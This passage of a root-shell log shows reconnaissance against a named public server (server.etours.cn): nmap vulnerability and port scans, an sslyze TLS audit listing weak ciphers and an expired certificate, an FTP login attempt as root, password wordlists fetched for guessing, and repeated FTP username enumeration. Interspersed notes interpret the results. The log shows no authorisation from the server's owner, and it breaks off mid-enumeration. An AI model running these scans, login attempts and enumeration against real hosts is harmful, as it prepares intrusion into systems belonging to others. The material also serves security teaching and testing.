  2368. | [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
  2369. | [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
  2370. | [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
  2371. | [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
  2372. | [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
  2373. | [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
  2374. | [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
  2375. | [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
  2376. |
  2377. | OSVDB - http://www.osvdb.org:
  2378. | [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
  2379. | [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
  2380. | [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
  2381. | [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
  2382. | [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
  2383. | [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
  2384. | [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
  2385. | [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
  2386. | [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
  2387. | [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
  2388. | [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
  2389. | [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
  2390. | [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
  2391. | [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
  2392. | [56921] OpenSSH Unspecified Remote Compromise
  2393. | [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
  2394. | [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
  2395. | [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
  2396. | [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
  2397. | [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
  2398. | [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
  2399. | [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
  2400. | [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
  2401. | [43745] OpenSSH X11 Forwarding Local Session Hijacking
  2402. | [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
  2403. | [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
  2404. | [37315] pam_usb OpenSSH Authentication Unspecified Issue
  2405. | [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
  2406. | [34601] OPIE w/ OpenSSH Account Enumeration
  2407. | [34600] OpenSSH S/KEY Authentication Account Enumeration
  2408. | [32721] OpenSSH Username Password Complexity Account Enumeration
  2409. | [30232] OpenSSH Privilege Separation Monitor Weakness
  2410. | [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
  2411. | [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
  2412. | [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
  2413. | [29152] OpenSSH Identical Block Packet DoS
  2414. | [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
  2415. | [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
  2416. | [22692] OpenSSH scp Command Line Filename Processing Command Injection
  2417. | [20216] OpenSSH with KerberosV Remote Authentication Bypass
  2418. | [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
  2419. | [19141] OpenSSH GSSAPIAuthentication Credential Escalation
  2420. | [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
  2421. | [16567] OpenSSH Privilege Separation LoginGraceTime DoS
  2422. | [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
  2423. | [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
  2424. | [9550] OpenSSH scp Traversal Arbitrary File Overwrite
  2425. | [6601] OpenSSH *realloc() Unspecified Memory Errors
  2426. | [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
  2427. | [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
  2428. | [6072] OpenSSH PAM Conversation Function Stack Modification
  2429. | [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
  2430. | [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
  2431. | [5408] OpenSSH echo simulation Information Disclosure
  2432. | [5113] OpenSSH NIS YP Netgroups Authentication Bypass
  2433. | [4536] OpenSSH Portable AIX linker Privilege Escalation
  2434. | [3938] OpenSSL and OpenSSH /dev/random Check Failure
  2435. | [3456] OpenSSH buffer_append_space() Heap Corruption
  2436. | [2557] OpenSSH Multiple Buffer Management Multiple Overflows
  2437. | [2140] OpenSSH w/ PAM Username Validity Timing Attack
  2438. | [2112] OpenSSH Reverse DNS Lookup Bypass
  2439. | [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
  2440. | [1853] OpenSSH Symbolic Link 'cookies' File Removal
  2441. | [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
  2442. | [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
  2443. | [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
  2444. | [688] OpenSSH UseLogin Environment Variable Local Command Execution
  2445. | [642] OpenSSH Multiple Key Type ACL Bypass
  2446. | [504] OpenSSH SSHv2 Public Key Authentication Bypass
  2447. | [341] OpenSSH UseLogin Local Privilege Escalation
  2448. |_
  2449.  
  2450. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2451. Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds
  2452.  
  2453.  
  2454. root@blackbox:/usr/share/nmap/scripts# nmap --script vuln -p80 184.154.192.250
  2455. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:32 CST
  2456. Pre-scan script results:
  2457. | broadcast-avahi-dos:
  2458. | Discovered hosts:
  2459. | 224.0.0.251
  2460. | After NULL UDP avahi packet DoS (CVE-2011-1002).
  2461. |_ Hosts are all up (not vulnerable).
  2462.  
  2463.  
  2464. root@blackbox:/usr/share/nmap/scripts# nmap --script vuln -p443 184.154.192.250
  2465. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:41 CST
  2466. Pre-scan script results:
  2467. | broadcast-avahi-dos:
  2468. | Discovered hosts:
  2469. | 224.0.0.251
  2470. | After NULL UDP avahi packet DoS (CVE-2011-1002).
  2471. |_ Hosts are all up (not vulnerable).
  2472.  
  2473.  
  2474.  
  2475.  
  2476. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 184.154.192.250 --open
  2477. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:43 CST
  2478. Nmap scan report for server.etours.cn (184.154.192.250)
  2479. Host is up (0.037s latency).
  2480.  
  2481. PORT STATE SERVICE
  2482. 22/tcp open ssh
  2483.  
  2484. Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds
  2485.  
  2486.  
  2487. root@blackbox:~# git clone https://github.com/0x4D31/hassh-utils.git
  2488. root@blackbox:~# cd hassh-utils/
  2489.  
  2490. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse --script-args database=hasshd 184.154.192.250 22
  2491. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:46 CST
  2492. Nmap scan report for server.etours.cn (184.154.192.250)
  2493. Host is up (0.14s latency).
  2494. Not shown: 981 closed ports
  2495. PORT STATE SERVICE
  2496. 21/tcp open ftp
  2497. 22/tcp open ssh
  2498. 25/tcp open smtp
  2499. 53/tcp open domain
  2500. 80/tcp open http
  2501. 106/tcp open pop3pw
  2502. 110/tcp open pop3
  2503. 111/tcp open rpcbind
  2504. 143/tcp open imap
  2505. 161/tcp filtered snmp
  2506. 443/tcp open https
  2507. 465/tcp open smtps
  2508. 554/tcp open rtsp
  2509. 587/tcp open submission
  2510. 993/tcp open imaps
  2511. 995/tcp open pop3s
  2512. 3306/tcp open mysql
  2513. 7070/tcp open realserver
  2514. 8443/tcp open https-alt
  2515.  
  2516. Nmap done: 2 IP addresses (1 host up) scanned in 15.66 seconds
  2517.  
  2518.  
  2519.  
  2520. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse --script-args client_string=SSH-2.0-asdf -p 22 184.154.192.250
  2521. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:47 CST
  2522. Nmap scan report for server.etours.cn (184.154.192.250)
  2523. Host is up (0.038s latency).
  2524.  
  2525. PORT STATE SERVICE
  2526. 22/tcp open ssh
  2527.  
  2528. Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds
  2529.  
  2530.  
  2531.  
  2532. root@blackbox:/usr/share/nmap/scripts# nmap -oN scan.nmap -v -sS -sU -T5 --top-ports 1000 184.154.192.250
  2533.  
  2534. Discovered open port 111/tcp on 184.154.192.250
  2535. Discovered open port 143/tcp on 184.154.192.250
  2536. Discovered open port 53/tcp on 184.154.192.250
  2537. Discovered open port 443/tcp on 184.154.192.250
  2538. Discovered open port 554/tcp on 184.154.192.250
  2539. Discovered open port 7070/tcp on 184.154.192.250
  2540. Discovered open port 21/tcp on 184.154.192.250
  2541. Discovered open port 22/tcp on 184.154.192.250
  2542. Discovered open port 587/tcp on 184.154.192.250
  2543. Discovered open port 80/tcp on 184.154.192.250
  2544. Discovered open port 110/tcp on 184.154.192.250
  2545. Discovered open port 25/tcp on 184.154.192.250
  2546. Discovered open port 993/tcp on 184.154.192.250
  2547. Discovered open port 3306/tcp on 184.154.192.250
  2548. Discovered open port 995/tcp on 184.154.192.250
  2549. Discovered open port 8443/tcp on 184.154.192.250
  2550. Discovered open port 106/tcp on 184.154.192.250
  2551. Discovered open port 465/tcp on 184.154.192.250
  2552. Discovered open port 111/udp on 184.154.192.250
  2553.  
  2554. Not shown: 1115 closed ports, 865 open|filtered ports
  2555. PORT STATE SERVICE
  2556. 21/tcp open ftp
  2557. 22/tcp open ssh
  2558. 25/tcp open smtp
  2559. 53/tcp open domain
  2560. 80/tcp open http
  2561. 106/tcp open pop3pw
  2562. 110/tcp open pop3
  2563. 111/tcp open rpcbind
  2564. 143/tcp open imap
  2565. 161/tcp filtered snmp
  2566. 443/tcp open https
  2567. 465/tcp open smtps
  2568. 554/tcp open rtsp
  2569. 587/tcp open submission
  2570. 993/tcp open imaps
  2571. 995/tcp open pop3s
  2572. 3306/tcp open mysql
  2573. 7070/tcp open realserver
  2574. 8443/tcp open https-alt
  2575. 111/udp open rpcbind
  2576.  
  2577.  
  2578. root@blackbox:/usr/share/nmap/scripts# nmap -oN vulners.nmap -sV --version-intensity 9 --script vulners -p 80 184.154.192.250
  2579. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:50 CST
  2580. Nmap scan report for server.etours.cn (184.154.192.250)
  2581. Host is up (0.037s latency).
  2582.  
  2583. PORT STATE SERVICE VERSION
  2584. 80/tcp open http Apache httpd (PleskLin)
  2585. |_http-server-header: Apache
  2586.  
  2587. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2588. Nmap done: 1 IP address (1 host up) scanned in 11.10 seconds
  2589.  
  2590.  
  2591. root@blackbox:/usr/share/nmap/scripts# nmap -oN vulners.nmap -sV --version-intensity 9 --script vulners -p 22 184.154.192.250
  2592. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:51 CST
  2593. Nmap scan report for server.etours.cn (184.154.192.250)
  2594. Host is up (0.037s latency).
  2595.  
  2596. PORT STATE SERVICE VERSION
  2597. 22/tcp open tcpwrapped
  2598.  
  2599. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2600. Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds
  2601.  
  2602.  
  2603. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 --open -Pn 184.154.192.250 -oX test.xml -vv
  2604.  
  2605. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 184.154.192.250
  2606. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:52 CST
  2607. Nmap scan report for server.etours.cn (184.154.192.250)
  2608. Host is up (0.037s latency).
  2609.  
  2610. PORT STATE SERVICE
  2611. 22/tcp open ssh
  2612.  
  2613. Nmap done: 1 IP address (1 host up) scanned in 1.56 seconds
  2614.  
  2615. EXPLAIN SHELL
  2616.  
  2617. https://explainshell.com/explain?cmd=nmap+-sC+-sV+-v++-oN
         Note on the two vulners runs above: the script only matches CVEs against a CPE with a version, so it printed nothing for port 80 (Apache exposes no version, only "PleskLin") and nothing for port 22, which came back "tcpwrapped" (handshake accepted, then closed before a banner — typically TCP wrappers or rate limiting). Re-run the SSH probe later with a lower --version-intensity, or use the ssh_scan banner further down (OpenSSH_4.3).
  2618.  
  2619.  
  2620. SSL SCAN USING SSLYZE
         Summary of the results below: SSLv2 and SSLv3 are still accepted, TLS 1.0 is the only TLS version offered (1.1/1.2/1.3 all rejected), export-grade 40-bit, DES, 3DES and RC4 suites are enabled, DHE uses 512/1024-bit groups, TLS_FALLBACK_SCSV and secure renegotiation are unsupported, TLS compression is on, and the certificate is the self-signed "Parallels Panel" default that expired 2012-09-13. The scan targeted the bare IP, so the certificate and cipher list belong to the default vhost; re-run with `--sni www.etours.cn` before attributing the certificate finding to the site itself.
  2621.  
  2622. root@blackbox:/usr/share/nmap/scripts# sslyze --regular 184.154.192.250:443
  2623.  
  2624.  
  2625.  
  2626. AVAILABLE PLUGINS
  2627. -----------------
  2628.  
  2629. HttpHeadersPlugin
  2630. SessionRenegotiationPlugin
  2631. CertificateInfoPlugin
  2632. SessionResumptionPlugin
  2633. FallbackScsvPlugin
  2634. OpenSslCcsInjectionPlugin
  2635. CompressionPlugin
  2636. RobotPlugin
  2637. HeartbleedPlugin
  2638. OpenSslCipherSuitesPlugin
  2639.  
  2640.  
  2641.  
  2642. CHECKING HOST(S) AVAILABILITY
  2643. -----------------------------
  2644.  
  2645. 184.154.192.250:443 => 184.154.192.250
  2646.  
  2647.  
  2648.  
  2649.  
  2650. SCAN RESULTS FOR 184.154.192.250:443 - 184.154.192.250
  2651. ------------------------------------------------------
  2652.  
  2653. * TLSV1_3 Cipher Suites:
  2654. Server rejected all cipher suites.
  2655.  
  2656. * Downgrade Attacks:
  2657. TLS_FALLBACK_SCSV: VULNERABLE - Signaling cipher suite not supported
  2658.  
  2659. * Session Renegotiation:
  2660. Client-initiated Renegotiation: OK - Rejected
  2661. Secure Renegotiation: VULNERABLE - Secure renegotiation not supported
  2662.  
  2663. * OpenSSL CCS Injection:
  2664. OK - Not vulnerable to OpenSSL CCS injection
  2665.  
  2666. * Deflate Compression:
  2667. VULNERABLE - Server supports Deflate compression
  2668.  
  2669. * Resumption Support:
  2670. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  2671. With TLS Tickets: OK - Supported
  2672.  
  2673. * TLSV1_1 Cipher Suites:
  2674. Server rejected all cipher suites.
  2675.  
  2676. * ROBOT Attack:
  2677. OK - Not vulnerable
  2678.  
  2679. * SSLV3 Cipher Suites:
  2680. Forward Secrecy OK - Supported
  2681. RC4 INSECURE - Supported
  2682.  
  2683. Preferred:
  2684. None - Server followed client cipher suite preference.
  2685. Accepted:
  2686. TLS_DHE_RSA_WITH_AES_256_CBC_SHA DH-1024 bits 256 bits HTTP 200 OK
  2687. TLS_RSA_WITH_AES_256_CBC_SHA - 256 bits HTTP 200 OK
  2688. TLS_DHE_RSA_WITH_AES_128_CBC_SHA DH-1024 bits 128 bits HTTP 200 OK
  2689. TLS_RSA_WITH_AES_128_CBC_SHA - 128 bits HTTP 200 OK
  2690. TLS_RSA_WITH_RC4_128_MD5 - 128 bits HTTP 200 OK
  2691. TLS_RSA_WITH_RC4_128_SHA - 128 bits HTTP 200 OK
  2692. TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA DH-1024 bits 112 bits HTTP 200 OK
  2693. TLS_RSA_WITH_3DES_EDE_CBC_SHA - 112 bits HTTP 200 OK
  2694. TLS_DHE_RSA_WITH_DES_CBC_SHA DH-1024 bits 56 bits HTTP 200 OK
  2695. TLS_RSA_WITH_DES_CBC_SHA - 56 bits HTTP 200 OK
  2696. TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA DH-512 bits 40 bits HTTP 200 OK
  2697. TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - 40 bits HTTP 200 OK
  2698. TLS_RSA_EXPORT_WITH_DES40_CBC_SHA - 40 bits HTTP 200 OK
  2699. TLS_RSA_EXPORT_WITH_RC4_40_MD5 - 40 bits HTTP 200 OK
  2700.  
  2701. * SSLV2 Cipher Suites:
  2702. Forward Secrecy INSECURE - Not Supported
  2703. RC4 INSECURE - Supported
  2704.  
  2705. Preferred:
  2706. None - Server followed client cipher suite preference.
  2707. Accepted:
  2708. SSL_CK_RC2_128_CBC_WITH_MD5 - 128 bits HTTP 200 OK
  2709. SSL_CK_RC4_128_WITH_MD5 - 128 bits HTTP 200 OK
  2710. SSL_CK_DES_192_EDE3_CBC_WITH_MD5 - 112 bits HTTP 200 OK
  2711. SSL_CK_DES_64_CBC_WITH_MD5 - 56 bits HTTP 200 OK
  2712. SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5 - 40 bits HTTP 200 OK
  2713. SSL_CK_RC4_128_EXPORT40_WITH_MD5 - 40 bits HTTP 200 OK
  2714.  
  2715. * Certificate Information:
  2716. Content
  2717. SHA1 Fingerprint: 3f12da575e9a2e4cdc624a2c64f2b3d9e8fea274
  2718. Common Name: Parallels Panel
  2719. Issuer: Parallels Panel
  2720. Serial Number: 1315993919
  2721. Not Before: 2011-09-14 09:51:59
  2722. Not After: 2012-09-13 09:51:59
  2723. Signature Algorithm: sha1
  2724. Public Key Algorithm: RSA
  2725. Key Size: 2048
  2726. Exponent: 65537 (0x10001)
  2727. DNS Subject Alternative Names: []
  2728.  
  2729. Trust
  2730. Hostname Validation: FAILED - Certificate does NOT match 184.154.192.250
  2731. Android CA Store (8.1.0_r9): FAILED - Certificate is NOT Trusted: self signed certificate
  2732. iOS CA Store (11): FAILED - Certificate is NOT Trusted: self signed certificate
  2733. Java CA Store (jre-10.0.2): FAILED - Certificate is NOT Trusted: self signed certificate
  2734. macOS CA Store (High Sierra): FAILED - Certificate is NOT Trusted: self signed certificate
  2735. Mozilla CA Store (2018-04-12): FAILED - Certificate is NOT Trusted: self signed certificate
  2736. Windows CA Store (2018-06-30): FAILED - Certificate is NOT Trusted: self signed certificate
  2737. Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
  2738. Received Chain: Parallels Panel
  2739. Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
  2740. Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
  2741. Received Chain Order: OK - Order is valid
  2742. Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
  2743.  
  2744. Extensions
  2745. OCSP Must-Staple: NOT SUPPORTED - Extension not found
  2746. Certificate Transparency: NOT SUPPORTED - Extension not found
  2747.  
  2748. OCSP Stapling
  2749. NOT SUPPORTED - Server did not send back an OCSP response
  2750.  
  2751. * OpenSSL Heartbleed:
  2752. OK - Not vulnerable to Heartbleed
  2753.  
  2754. * TLSV1_2 Cipher Suites:
  2755. Server rejected all cipher suites.
  2756.  
  2757. * TLSV1 Cipher Suites:
  2758. Forward Secrecy OK - Supported
  2759. RC4 INSECURE - Supported
  2760.  
  2761. Preferred:
  2762. None - Server followed client cipher suite preference.
  2763. Accepted:
  2764. TLS_DHE_RSA_WITH_AES_256_CBC_SHA DH-1024 bits 256 bits HTTP 200 OK
  2765. TLS_RSA_WITH_AES_256_CBC_SHA - 256 bits HTTP 200 OK
  2766. TLS_DHE_RSA_WITH_AES_128_CBC_SHA DH-1024 bits 128 bits HTTP 200 OK
  2767. TLS_RSA_WITH_AES_128_CBC_SHA - 128 bits HTTP 200 OK
  2768. TLS_RSA_WITH_RC4_128_SHA - 128 bits HTTP 200 OK
  2769. TLS_RSA_WITH_RC4_128_MD5 - 128 bits HTTP 200 OK
  2770. TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA DH-1024 bits 112 bits HTTP 200 OK
  2771. TLS_RSA_WITH_3DES_EDE_CBC_SHA - 112 bits HTTP 200 OK
  2772. TLS_DHE_RSA_WITH_DES_CBC_SHA DH-1024 bits 56 bits HTTP 200 OK
  2773. TLS_RSA_WITH_DES_CBC_SHA - 56 bits HTTP 200 OK
  2774. TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA DH-512 bits 40 bits HTTP 200 OK
  2775. TLS_RSA_EXPORT_WITH_DES40_CBC_SHA - 40 bits HTTP 200 OK
  2776. TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - 40 bits HTTP 200 OK
  2777. TLS_RSA_EXPORT_WITH_RC4_40_MD5 - 40 bits HTTP 200 OK
  2778.  
  2779.  
  2780. SCAN COMPLETED IN 18.49 S
  2781. -------------------------
  2782.  
  2783.  
  2784.  
  2785. CHECK FTP LOGIN (ProFTPD 1.3.3e banner). Note: the manual attempt below used the client's default username "root" plus a password, not an anonymous login; anonymous/ftp were only tried via ftp-user-enum further down. The server replies "331 Password required for <user>" before checking credentials, which — judging by the enumeration results below — it appears to do for any name.
  2786.  
  2787. root@blackbox:/usr/share/nmap/scripts# ftp 184.154.192.250
  2788. Connected to 184.154.192.250.
  2789. 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  2790. Name (184.154.192.250:root):
  2791. 331 Password required for root
  2792. Password:
  2793. 530 Login incorrect.
  2794. Login failed.
  2795. Remote system type is UNIX.
  2796. Using binary mode to transfer files.
  2797. ftp> quit
  2798. 221 Goodbye.
  2799.  
  2800.  
  2801. download a password list, for example:
  2802.  
  2803. https://github.com/berzerk0/Probable-Wordlists
         (the runs below actually use jeanphorn/wordlist and commix's passwords_john.txt, not this one)
  2804.  
  2805. root@blackbox:~# git clone https://github.com/jeanphorn/wordlist.git
  2806. root@blackbox:~# cd wordlist/
  2807. root@blackbox:~/wordlist# ls
  2808. adobe_top100_password.txt passlist.txt router_default_password.md
  2809. hydra.restore rdp_passlist.txt ssh_passwd.txt
  2810. pass_list.rar README.md usernames.txt
  2811.  
  2812. or search locally
  2813.  
  2814. user list
  2815. /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2816.  
  2817. root@blackbox:/opt/patator# locate john.txt
  2818. /opt/commix/src/txt/passwords_john.txt
  2819. /opt/hacktronian/commix/src/txt/passwords_john.txt
  2820. /usr/share/commix/src/txt/passwords_john.txt
  2821.  
  2822.  
  2823. ftp-user-enum (caveat: all three runs below report every one of the 34 names — 34 results for 34 queries, including improbable ones such as owaspbwa, msfadmin and Fortimanager_Access — so the server does not distinguish valid from invalid users at the USER stage and this output is not evidence that any of these accounts exist; treat the list as unverified)
  2824.  
  2825. root@blackbox:/opt# wget http://pentestmonkey.net/tools/ftp-user-enum/ftp-user-enum-1.0.tar.gz
  2826. root@blackbox:/opt# tar -xzf ftp-user-enum-1.0.tar.gz
  2827. root@blackbox:/opt# cd ftp-user-enum-1.0/
  2828. root@blackbox:/opt/ftp-user-enum-1.0# cp ftp-user-enum.pl /usr/local/bin/
  2829. root@blackbox:/opt/ftp-user-enum-1.0# perl -MCPAN -e shell
  2830. cpan[1]> install Getopt::Std
  2831. cpan[2]> exit
  2832. Lockfile removed.
  2833.  
  2834.  
  2835. root@blackbox:/opt/ftp-user-enum-1.0# ls
  2836. CHANGELOG COPYING COPYING.GPL ftp-user-enum.pl ftp-user-enum-user-docs.pdf
  2837. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -M sol -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2838. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2839.  
  2840. ----------------------------------------------------------
  2841. | Scan Information |
  2842. ----------------------------------------------------------
  2843.  
  2844. Mode ..................... sol
  2845. Worker Processes ......... 5
  2846. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2847. Target count ............. 1
  2848. Username count ........... 34
  2849. Target TCP port .......... 21
  2850. Query timeout ............ 15 secs
  2851.  
  2852. ######## Scan started at Wed Jan 22 14:56:54 2020 #########
  2853. @184.154.192.250: bee
  2854. @184.154.192.250: administrator
  2855. backup@184.154.192.250: backup
  2856. @184.154.192.250: anonymous
  2857. @184.154.192.250: admin
  2858. @184.154.192.250: guest
  2859. @184.154.192.250: ftp
  2860. @184.154.192.250: GUEST
  2861. @184.154.192.250: info
  2862. @184.154.192.250: mail
  2863. @184.154.192.250: mysql
  2864. @184.154.192.250: msfadmin
  2865. @184.154.192.250: nobody
  2866. @184.154.192.250: mailadmin
  2867. oracle@184.154.192.250: oracle
  2868. @184.154.192.250: owaspbwa
  2869. @184.154.192.250: private
  2870. @184.154.192.250: postfix
  2871. @184.154.192.250: proftpd
  2872. @184.154.192.250: postgres
  2873. @184.154.192.250: root
  2874. @184.154.192.250: public
  2875. @184.154.192.250: support
  2876. @184.154.192.250: sys
  2877. @184.154.192.250: superadmin
  2878. @184.154.192.250: systemadmin
  2879. @184.154.192.250: system
  2880. @184.154.192.250: systemadministrator
  2881. @184.154.192.250: test
  2882. @184.154.192.250: tomcat
  2883. @184.154.192.250: webmaster
  2884. @184.154.192.250: user
  2885. www-data@184.154.192.250: www-data
  2886. Fortimanager_Access@184.154.192.250: Fortimanager_Access
  2887. ######## Scan completed at Wed Jan 22 14:58:39 2020 #########
  2888. 34 results.
  2889.  
  2890. 34 queries in 105 seconds (0.3 queries / sec)
  2891.  
  2892. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -M iu -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2893. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2894.  
  2895. ----------------------------------------------------------
  2896. | Scan Information |
  2897. ----------------------------------------------------------
  2898.  
  2899. Mode ..................... iu
  2900. Worker Processes ......... 5
  2901. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2902. Target count ............. 1
  2903. Username count ........... 34
  2904. Target TCP port .......... 21
  2905. Query timeout ............ 15 secs
  2906.  
  2907. ######## Scan started at Wed Jan 22 14:59:28 2020 #########
  2908. @184.154.192.250: administrator
  2909. @184.154.192.250: anonymous
  2910. backup@184.154.192.250: backup
  2911. @184.154.192.250: admin
  2912. @184.154.192.250: bee
  2913. @184.154.192.250: ftp
  2914. @184.154.192.250: GUEST
  2915. @184.154.192.250: guest
  2916. @184.154.192.250: info
  2917. @184.154.192.250: mail
  2918. @184.154.192.250: mailadmin
  2919. @184.154.192.250: msfadmin
  2920. @184.154.192.250: mysql
  2921. @184.154.192.250: nobody
  2922. oracle@184.154.192.250: oracle
  2923. @184.154.192.250: owaspbwa
  2924. @184.154.192.250: postfix
  2925. @184.154.192.250: postgres
  2926. @184.154.192.250: private
  2927. @184.154.192.250: proftpd
  2928. @184.154.192.250: public
  2929. @184.154.192.250: root
  2930. @184.154.192.250: superadmin
  2931. @184.154.192.250: support
  2932. @184.154.192.250: sys
  2933. @184.154.192.250: system
  2934. @184.154.192.250: systemadmin
  2935. @184.154.192.250: test
  2936. @184.154.192.250: systemadministrator
  2937. @184.154.192.250: tomcat
  2938. @184.154.192.250: user
  2939. @184.154.192.250: webmaster
  2940. www-data@184.154.192.250: www-data
  2941. Fortimanager_Access@184.154.192.250: Fortimanager_Access
  2942. ######## Scan completed at Wed Jan 22 14:59:33 2020 #########
  2943. 34 results.
  2944.  
  2945. 34 queries in 5 seconds (6.8 queries / sec)
  2946.  
  2947.  
  2948. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2949. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2950.  
  2951. ----------------------------------------------------------
  2952. | Scan Information |
  2953. ----------------------------------------------------------
  2954.  
  2955. Mode ..................... sol
  2956. Worker Processes ......... 5
  2957. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2958. Target count ............. 1
  2959. Username count ........... 34
  2960. Target TCP port .......... 21
  2961. Query timeout ............ 15 secs
  2962.  
  2963. ######## Scan started at Wed Jan 22 15:00:21 2020 #########
  2964. @184.154.192.250: administrator
  2965. @184.154.192.250: anonymous
  2966. @184.154.192.250: admin
  2967. @184.154.192.250: bee
  2968. backup@184.154.192.250: backup
  2969. @184.154.192.250: ftp
  2970. @184.154.192.250: guest
  2971. @184.154.192.250: GUEST
  2972. @184.154.192.250: info
  2973. @184.154.192.250: mail
  2974. @184.154.192.250: mailadmin
